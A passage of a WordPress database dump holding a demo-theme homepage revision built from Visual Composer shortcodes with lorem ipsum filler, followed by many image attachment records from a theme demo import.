css=\".vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409774017224{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a875-582a0add-8af2\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a875-582a0add-8af2\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a875-582a0add-8af2\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453002397{background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" customcolor_heading=\"#303030\" customcolor_text=\"#2d2d2d\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452676244{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i61.jpg?id=541) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home11','','inherit','closed','closed','','753-autosave-v1','','','2020-10-28 13:52:48','2020-10-28 13:52:48','',753,'http://highperformingstudent.com/2020/10/28/753-autosave-v1/',0,'revision','',0),(1933,1,'2020-10-28 13:53:32','2020-10-28 13:53:32','','One Click Demo Import - log_file_2020-10-28__13-53-32','','inherit','open','closed','','one-click-demo-import-log_file_2020-10-28__13-53-32','','','2020-10-28 13:53:32','2020-10-28 13:53:32','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/log_file_2020-10-28__13-53-32.txt',0,'attachment','text/plain',0),(1934,1,'2014-07-11 16:02:56','2014-07-11 16:02:56','','01','','inherit','open','open','','01-3','','','2014-07-11 16:02:56','2014-07-11 16:02:56','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/012.jpg',0,'attachment','image/jpeg',0),(1935,1,'2014-07-11 16:02:58','2014-07-11 16:02:58','','02','','inherit','open','open','','02-3','','','2014-07-11 16:02:58','2014-07-11 16:02:58','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/022.jpg',0,'attachment','image/jpeg',0),(1936,1,'2014-07-11 16:03:01','2014-07-11 16:03:01','','03','','inherit','open','open','','03-3','','','2014-07-11 16:03:01','2014-07-11 16:03:01','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/032.jpg',0,'attachment','image/jpeg',0),(1937,1,'2014-07-11 16:03:03','2014-07-11 16:03:03','','04','','inherit','open','open','','04-3','','','2014-07-11 16:03:03','2014-07-11 16:03:03','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/042.jpg',0,'attachment','image/jpeg',0),(1938,1,'2014-07-11 16:03:05','2014-07-11 16:03:05','','05','','inherit','open','open','','05-2','','','2014-07-11 16:03:05','2014-07-11 16:03:05','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/051.jpg',0,'attachment','image/jpeg',0),(1939,1,'2014-07-11 16:03:07','2014-07-11 16:03:07','','06','','inherit','open','open','','06-2','','','2014-07-11 16:03:07','2014-07-11 16:03:07','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/061.jpg',0,'attachment','image/jpeg',0),(1940,1,'2014-07-11 16:03:09','2014-07-11 16:03:09','','07','','inherit','open','open','','07-2','','','2014-07-11 16:03:09','2014-07-11 16:03:09','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/071.jpg',0,'attachment','image/jpeg',0),(1941,1,'2014-07-11 16:03:13','2014-07-11 16:03:13','','08','','inherit','open','open','','08-2','','','2014-07-11 16:03:13','2014-07-11 16:03:13','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/081.jpg',0,'attachment','image/jpeg',0),(1942,1,'2014-07-11 16:03:18','2014-07-11 16:03:18','','09','','inherit','open','open','','09-2','','','2014-07-11 16:03:18','2014-07-11 16:03:18','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/091.jpg',0,'attachment','image/jpeg',0),(1943,1,'2014-07-11 16:03:20','2014-07-11 16:03:20','','10','','inherit','open','open','','10-2','','','2014-07-11 16:03:20','2014-07-11 16:03:20','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/101.jpg',0,'attachment','image/jpeg',0),(1944,1,'2014-07-11 16:03:22','2014-07-11 16:03:22','','11','','inherit','open','open','','11-2','','','2014-07-11 16:03:22','2014-07-11 16:03:22','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/111.jpg',0,'attachment','image/jpeg',0),(1945,1,'2014-07-11 16:03:28','2014-07-11 16:03:28','','12','','inherit','open','open','','12-2','','','2014-07-11 16:03:28','2014-07-11 16:03:28','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/121.jpg',0,'attachment','image/jpeg',0),(1946,1,'2014-07-11 16:03:30','2014-07-11 16:03:30','','13','','inherit','open','open','','13-2','','','2014-07-11 16:03:30','2014-07-11 16:03:30','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/131.jpg',0,'attachment','image/jpeg',0),(1947,1,'2014-07-11 16:03:32','2014-07-11 16:03:32','','14','','inherit','open','open','','14-2','','','2014-07-11 16:03:32','2014-07-11 16:03:32','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/141.jpg',0,'attachment','image/jpeg',0),(1948,1,'2014-07-11 16:03:35','2014-07-11 16:03:35','','15','','inherit','open','open','','15-2','','','2014-07-11 16:03:35','2014-07-11 16:03:35','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/151.jpg',0,'attachment','image/jpeg',0),(1949,1,'2014-07-11 16:05:43','2014-07-11 16:05:43','','i1','','inherit','open','open','','i1-2','','','2014-07-11 16:05:43','2014-07-11 16:05:43','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/i11.jpg',0,'attachment','image/jpeg',0),(1950,1,'2014-07-11 16:05:44','2014-07-11 16:05:44','','i2','','inherit','open','open','','i2-2','','','2014-07-11 16:05:44','2014-07-11 16:05:44','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/i21.jpg',0,'attachment','image/jpeg',0),(1951,1,'2014-07-11 16:05:46','2014-07-11 16:05:46','','i3','','inherit','open','open','','i3-2','','','2014-07-11 16:05:46','2014-07-11 16:05:46','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/i31.jpg',0,'attachment','image/jpeg',0),(1952,1,'2014-07-11 16:05:47','2014-07-11 16:05:47','','i4','','inherit','open','open','','i4-2','','','2014-07-11 16:05:47','2014-07-11 16:05:47','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/i41.jpg',0,'attachment','image/jpeg',0),(1953,1,'2014-07-11 16:05:49','2014-07-11 16:05:49','','i5','','inherit','open','open','','i5-2','','','2014-07-11 16:05:49','2014-07-11 16:05:49','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/i51.jpg',0,'attachment','image/jpeg',0),(1954,1,'2014-07-11 16:05:50','2014-07-11 16:05:50','','i6','','inherit','open','open','','i6-2','','','2014-07-11 16:05:50','2014-07-11 16:05:50','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/i61.jpg',0,'attachment','image/jpeg',0),(1955,1,'2014-07-11 16:05:54','2014-07-11 16:05:54','','slide1','','inherit','open','open','','slide1-2','','','2014-07-11 16:05:54','2014-07-11 16:05:54','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide13.jpg',0,'attachment','image/jpeg',0),(1956,1,'2014-07-11 16:05:59','2014-07-11 16:05:59','','slide2','','inherit','open','open','','slide2-2','','','2014-07-11 16:05:59','2014-07-11 16:05:59','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide21.jpg',0,'attachment','image/jpeg',0),(1957,1,'2014-07-11 16:06:03','2014-07-11 16:06:03','','slide3','','inherit','open','open','','slide3-2','','','2014-07-11 16:06:03','2014-07-11 16:06:03','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide31.jpg',0,'attachment','image/jpeg',0),(1958,1,'2014-07-11 16:06:06','2014-07-11 16:06:06','','slide4','','inherit','open','open','','slide4-2','','','2014-07-11 16:06:06','2014-07-11 16:06:06','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide41.jpg',0,'attachment','image/jpeg',0),(1959,1,'2014-07-11 16:06:10','2014-07-11 16:06:10','','slide5','','inherit','open','open','','slide5-2','','','2014-07-11 16:06:10','2014-07-11 16:06:10','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide51.jpg',0,'attachment','image/jpeg',0),(1960,1,'2014-07-11 16:06:14','2014-07-11 16:06:14','','slide6','','inherit','open','open','','slide6-2','','','2014-07-11 16:06:14','2014-07-11 16:06:14','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide61.jpg',0,'attachment','image/jpeg',0),(1961,1,'2014-07-11 16:06:18','2014-07-11 16:06:18','','slide7','','inherit','open','open','','slide7-2','','','2014-07-11 16:06:18','2014-07-11 16:06:18','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide71.jpg',0,'attachment','image/jpeg',0),(1962,1,'2014-07-11 16:06:24','2014-07-11 16:06:24','','slide8','','inherit','open','open','','slide8-2','','','2014-07-11 16:06:24','2014-07-11 16:06:24','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide81.jpg',0,'attachment','image/jpeg',0),(1963,1,'2014-07-11 16:06:28','2014-07-11 16:06:28','','slide9','','inherit','open','open','','slide9-2','','','2014-07-11 16:06:28','2014-07-11 16:06:28','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide91.jpg',0,'attachment','image/jpeg',0),(1964,1,'2014-07-11 16:06:33','2014-07-11 16:06:33','','slide10','','inherit','open','open','','slide10-2','','','2014-07-11 16:06:33','2014-07-11 16:06:33','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide101.jpg',0,'attachment','image/jpeg',0),(1965,1,'2014-07-11 16:06:37','2014-07-11 16:06:37','','slide11','','inherit','open','open','','slide11-2','','','2014-07-11 16:06:37','2014-07-11 16:06:37','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide111.jpg',0,'attachment','image/jpeg',0),(1966,1,'2014-07-11 16:06:41','2014-07-11 16:06:41','','slide12','','inherit','open','open','','slide12-2','','','2014-07-11 16:06:41','2014-07-11 16:06:41','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slide121.jpg',0,'attachment','image/jpeg',0),(1967,1,'2014-07-11 16:06:51','2014-07-11 16:06:51','','01','','inherit','open','open','','01-2-2','','','2014-07-11 16:06:51','2014-07-11 16:06:51','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/0111.jpg',0,'attachment','image/jpeg',0),(1968,1,'2014-07-11 16:06:53','2014-07-11 16:06:53','','02','','inherit','open','open','','02-2-2','','','2014-07-11 16:06:53','2014-07-11 16:06:53','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/0211.jpg',0,'attachment','image/jpeg',0),(1969,1,'2014-07-11 16:06:55','2014-07-11 16:06:55','It is a long established fact that a reader will be distracted layout.','03','Your image caption here','inherit','open','open','','03-2-2','','','2014-07-11 16:06:55','2014-07-11 16:06:55','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/0311.jpg',0,'attachment','image/jpeg',0),(1970,1,'2014-07-11 16:06:57','2014-07-11 16:06:57','It is a long established fact that a reader will be distracted layout.','04','Any Description','inherit','open','open','','04-2-2','','','2014-07-11 16:06:57','2014-07-11 16:06:57','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/0411.jpg',0,'attachment','image/jpeg',0),(1971,1,'2014-07-11 16:06:59','2014-07-11 16:06:59','','b-slide1','','inherit','open','open','','b-slide1-2','','','2014-07-11 16:06:59','2014-07-11 16:06:59','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/b-slide11.jpg',0,'attachment','image/jpeg',0),(1972,1,'2014-07-11 16:07:03','2014-07-11 16:07:03','','b-slide2','','inherit','open','open','','b-slide2-2','','','2014-07-11 16:07:03','2014-07-11 16:07:03','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/b-slide21.jpg',0,'attachment','image/jpeg',0),(1973,1,'2014-07-11 16:07:06','2014-07-11 16:07:06','','m-slide1','','inherit','open','open','','m-slide1-2','','','2014-07-11 16:07:06','2014-07-11 16:07:06','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/m-slide11.jpg',0,'attachment','image/jpeg',0),(1974,1,'2014-07-11 16:07:08','2014-07-11 16:07:08','','m-slide2','','inherit','open','open','','m-slide2-2','','','2014-07-11 16:07:08','2014-07-11 16:07:08','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/m-slide21.jpg',0,'attachment','image/jpeg',0),(1975,1,'2014-07-11 16:07:10','2014-07-11 16:07:10','','m-slide3','','inherit','open','open','','m-slide3-2','','','2014-07-11 16:07:10','2014-07-11 16:07:10','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/m-slide31.jpg',0,'attachment','image/jpeg',0),(1976,1,'2014-07-11 16:07:24','2014-07-11 16:07:24','','logo1','','inherit','open','open','','logo1-2','','','2014-07-11 16:07:24','2014-07-11 16:07:24','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/logo11.png',0,'attachment','image/png',0),(1977,1,'2014-07-11 16:07:24','2014-07-11 16:07:24','','logo2','','inherit','open','open','','logo2-2','','','2014-07-11 16:07:24','2014-07-11 16:07:24','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/logo21.png',0,'attachment','image/png',0),(1978,1,'2014-07-11 16:07:24','2014-07-11 16:07:24','','logo3','','inherit','open','open','','logo3-2','','','2014-07-11 16:07:24','2014-07-11 16:07:24','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/logo31.png',0,'attachment','image/png',0),(1979,1,'2014-07-11 16:07:25','2014-07-11 16:07:25','','logo4','','inherit','open','open','','logo4-2','','','2014-07-11 16:07:25','2014-07-11 16:07:25','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/logo41.png',0,'attachment','image/png',0),(1980,1,'2014-07-11 16:07:25','2014-07-11 16:07:25','','logo5','','inherit','open','open','','logo5-2','','','2014-07-11 16:07:25','2014-07-11 16:07:25','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/logo51.png',0,'attachment','image/png',0),(1981,1,'2014-07-11 16:07:26','2014-07-11 16:07:26','','logo6','','inherit','open','open','','logo6-2','','','2014-07-11 16:07:26','2014-07-11 16:07:26','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/logo61.png',0,'attachment','image/png',0),(1982,1,'2014-07-11 16:07:37','2014-07-11 16:07:37','','1b','','inherit','open','open','','1b-2','','','2014-07-11 16:07:37','2014-07-11 16:07:37','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/1b1.jpg',0,'attachment','image/jpeg',0),(1983,1,'2014-07-11 16:07:38','2014-07-11 16:07:38','','2b','','inherit','open','open','','2b-2','','','2014-07-11 16:07:38','2014-07-11 16:07:38','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/2b1.jpg',0,'attachment','image/jpeg',0),(1984,1,'2014-07-11 16:07:39','2014-07-11 16:07:39','','3b','','inherit','open','open','','3b-2','','','2014-07-11 16:07:39','2014-07-11 16:07:39','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/3b1.jpg',0,'attachment','image/jpeg',0),(1985,1,'2014-07-11 16:07:40','2014-07-11 16:07:40','','4b','','inherit','open','open','','4b-2','','','2014-07-11 16:07:40','2014-07-11 16:07:40','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/4b1.jpg',0,'attachment','image/jpeg',0),(1986,1,'2014-07-11 16:07:41','2014-07-11 16:07:41','','5b','','inherit','open','open','','5b-2','','','2014-07-11 16:07:41','2014-07-11 16:07:41','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/5b1.jpg',0,'attachment','image/jpeg',0),(1987,1,'2014-07-11 16:07:42','2014-07-11 16:07:42','','6b','','inherit','open','open','','6b-2','','','2014-07-11 16:07:42','2014-07-11 16:07:42','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/6b1.jpg',0,'attachment','image/jpeg',0),(1988,1,'2014-07-11 16:32:49','2014-07-11 16:32:49','','7','','inherit','open','open','','7-2','','','2014-07-11 16:32:49','2014-07-11 16:32:49','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/71.jpg',0,'attachment','image/jpeg',0),(1989,1,'2014-07-11 16:33:06','2014-07-11 16:33:06','','3','','inherit','open','open','','3-2-2','','','2014-07-11 16:33:06','2014-07-11 16:33:06','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/311.jpg',0,'attachment','image/jpeg',0),(1990,1,'2014-07-11 16:33:13','2014-07-11 16:33:13','','1','','inherit','open','open','','1-2-2','','','2014-07-11 16:33:13','2014-07-11 16:33:13','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/111.jpg',0,'attachment','image/jpeg',0),(1991,1,'2014-07-11 16:33:14','2014-07-11 16:33:14','','3','','inherit','open','open','','3-3-2','','','2014-07-11 16:33:14','2014-07-11 16:33:14','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/321.jpg',0,'attachment','image/jpeg',0),(1992,1,'2014-07-11 16:33:15','2014-07-11 16:33:15','','4','','inherit','open','open','','4-2-2','','','2014-07-11 16:33:15','2014-07-11 16:33:15','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/411.jpg',0,'attachment','image/jpeg',0),(1993,1,'2014-07-11 16:33:15','2014-07-11 16:33:15','','5','','inherit','open','open','','5-2-2','','','2014-07-11 16:33:15','2014-07-11 16:33:15','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/511.jpg',0,'attachment','image/jpeg',0),(1994,1,'2014-07-14 14:32:02','2014-07-14 14:32:02','','slidebg.jpg','','inherit','closed','closed','','slidebg-jpg-2','','','2014-07-14 14:32:02','2014-07-14 14:32:02','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slidebg4.jpg',0,'attachment','image/jpeg',0),(1995,1,'2014-07-14 14:32:02','2014-07-14 14:32:02','','slidebg2.jpg','','inherit','closed','closed','','slidebg2-jpg-2','','','2014-07-14 14:32:02','2014-07-14 14:32:02','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/slidebg22.jpg',0,'attachment','image/jpeg',0),(1996,1,'2014-07-11 16:33:16','2014-07-11 16:33:16','','6','','inherit','open','open','','6-2-2','','','2014-07-11 16:33:16','2014-07-11 16:33:16','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/611.jpg',0,'attachment','image/jpeg',0),(1997,1,'2014-07-11 16:40:40','2014-07-11 16:40:40','','logo-dark','','inherit','open','open','','logo-dark-2','','','2014-07-11 16:40:40','2014-07-11 16:40:40','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/logo-dark1.png',0,'attachment','image/png',0),(1998,1,'2014-07-11 16:40:41','2014-07-11 16:40:41','','logo','','inherit','open','open','','logo-2','','','2014-07-11 16:40:41','2014-07-11 16:40:41','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/logo7.png',0,'attachment','image/png',0),(1999,1,'2014-07-11 17:16:39','2014-07-11 17:16:39','','mac','','inherit','open','open','','mac-2','','','2014-07-11 17:16:39','2014-07-11 17:16:39','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/mac1.png',0,'attachment','image/png',0),(2000,1,'2014-07-11 17:21:46','2014-07-11 17:21:46','','features-iphone','','inherit','open','open','','features-iphone-2','','','2014-07-11 17:21:46','2014-07-11 17:21:46','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/06/features-iphone1.png',0,'attachment','image/png',0),(2001,1,'2014-07-13 08:55:48','2014-07-13 08:55:48','','nonslidebg2','','inherit','open','open','','nonslidebg2-2','','','2014-07-13 08:55:48','2014-07-13 08:55:48','',0,'http://veented.com/workshops/north/north5/wp-content/uploads/2014/07/nonslidebg21.jpg',0,'attachment','image/jpeg',0),(2002,1,'2014-07-13 08:55:50','2014-07-13 08:55:50','','slidebg','','inherit','open','open','','slidebg-2','','','2014-07-13 08:55:50','2014-07-13 